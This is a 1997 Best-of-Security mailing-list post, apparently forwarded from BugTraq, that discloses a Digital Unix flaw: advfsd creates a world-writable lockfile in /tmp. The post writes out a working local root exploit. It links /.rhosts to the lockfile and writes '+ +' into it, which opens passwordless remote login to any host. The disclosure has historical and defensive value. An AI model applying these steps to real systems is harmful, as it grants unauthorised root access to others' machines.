[488] in Best-of-Security
BoS: (LOWNOISE) Another Digital Unix Security Problem0
daemon@ATHENA.MIT.EDU (Efrain Torres Mejia)
Thu Nov 27 12:19:22 1997
Delivering-To: best-of-security@cyber.com.au
Date: Tue, 18 Nov 1997 12:17:00 -0500
Reply-To: Efrain Torres Mejia <etorres@POLLUX.JAVERIANA.EDU.CO>
From: Efrain Torres Mejia <etorres@POLLUX.JAVERIANA.EDU.CO>
In-Reply-To: <Pine.OSF.3.96.971112142044.12555C-100000@homer.bus.miami.edu>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: Efrain Torres Mejia <etorres@POLLUX.JAVERIANA.EDU.CO>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.
==========================
H0l4. So here it is another bug for Digital
System: OSF1 my.narco-goverment.sucks.co V4.0 464 alpha
Program: fstab - Static information about file systems and swap partitions
advfsd - Starts the AdvFS graphical user interface daemon
Problemo: It creates a lockfile in tmp with nice permitions :)
/tmp>ls -la
(Blah Blah Blah.....)
-rw-rw-rw- 1 root system 0 Nov xx 15:49 fstab.advfsd.lockfile
What the hell to do with it:
Before it creates
ln -s /.rhosts /tmp/fstab.advfsd.lockfile
from here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.
if u like to cut:
------------------------- Cut here --------------------
------------------------- and here --------------------
The End - El Fin
Colombia 1997.
.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.
Efrain 'ET' Torres
